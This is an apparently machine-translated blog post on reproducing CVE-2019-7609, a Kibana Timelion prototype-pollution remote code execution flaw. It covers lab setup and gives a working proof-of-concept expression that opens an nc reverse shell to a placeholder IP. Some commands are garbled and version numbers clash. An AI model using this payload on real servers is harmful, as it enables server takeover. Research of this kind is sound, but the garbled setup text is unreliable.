Shulou(Shulou.com)06/01 Report--

How to analyze the recurrence of CVE-2019-7609 vulnerability in Kibana remote code execution? I believe many inexperienced people are at a loss about this. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Introduction to 0x00

Kibana is an open source analysis and visualization platform designed for Elasticsearch. You can use Kibana to search, view and interact with the data stored in the Elasticsearch index. You can easily implement advanced data analysis and visualization in the form of icons.

Overview of 0x01 vulnerabilities

The vulnerability can be exploited by an attacker to initiate a request to Kibana through a JavaScript prototype chain contamination attack in the Timelion component, thereby taking over the server and executing arbitrary commands on the server.

0x02 affects version

Kibana < 6.6.1

Kibana < 5.6.15

0x03 environment building

It was originally intended to be built by docker, but because of the network failure, it was built by kali directly.

The affected version is Kibana < 6.6.0. Here, 6.5.3 is selected to build and modify more than 4G of virtual machine memory.

1. Elasticsearch installation

A) first go to the official website to download the 6.5.3 tar package and decompress it.

Wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gztar-zxvf elasticsearch-6.5.3.tar.gz

B) just run it directly

Cd elasticsearch-6.5.3./bin/elasticsearch

* * there is a pit here * *:

I. es should be started with a non-root user, otherwise an `can not run elasticsearch as root` error will be reported.

Solution: start it with a non-root user.

ii. If the previous es is downloaded and unzipped by root users, an error `AccessDeniedException` will be reported when starting it directly with ordinary users.

Solution: change the owner of the document

Elk@kali:~$ sudo chown-R ubuntu ~ / elasticsearch-6.5.3/

Elk@kali:~$ sudo chgrp-R ubuntu ~ / elasticsearch-6.5.3/

iii. Es needs java support. Since I built it on kali, I didn't write about the process of installing java (kali comes with openJDK). As for how to install emmm in java, it's a good question. Baidu goes to.

This article only provides download of JDK network disk (official account replies to JDK)

Visit http://127.0.0.1:9200/. If it looks like this, it means that es has started successfully.

2. Kibana installation

A) download and decompress the compressed package on the official website

Wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gztar-zxvf kibana-5.4.3-linux-x86_64.tar.gz

B) run directly

Cd kibana-5.4.3-linux-x86_64./bin/kibana

The construction is successful and exciting!

Take a look at the version number, um, there is a loophole.

0x04 vulnerability exploitation

The leak is at Timelion (the name is a bit like Timeline)

Enter Poc directly. The process and result are shown in the figure:

There is a rush to "cook for half an hour and eat for ten minutes" [cover your face manually]

Some people may say that my payload is different from that of the author. I just changed my way of bouncing shell. The author doesn't know why I hit 2333 on my kali.

Poc:

.es (*) .props (label.__proto__.env.AAAA='require ("child_process"). Exec ("nc-e / bin/sh xx.xx.xx.xx 4321"); process.exit () / /') .props (label.__proto__.env.NODE_OPTIONS='--require / proc/self/environ')

0x05 repair mode

Upgrade Kibana to a new version

After reading the above, do you know how to analyze the recurrence of CVE-2019-7609 vulnerabilities in Kibana remote code execution? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.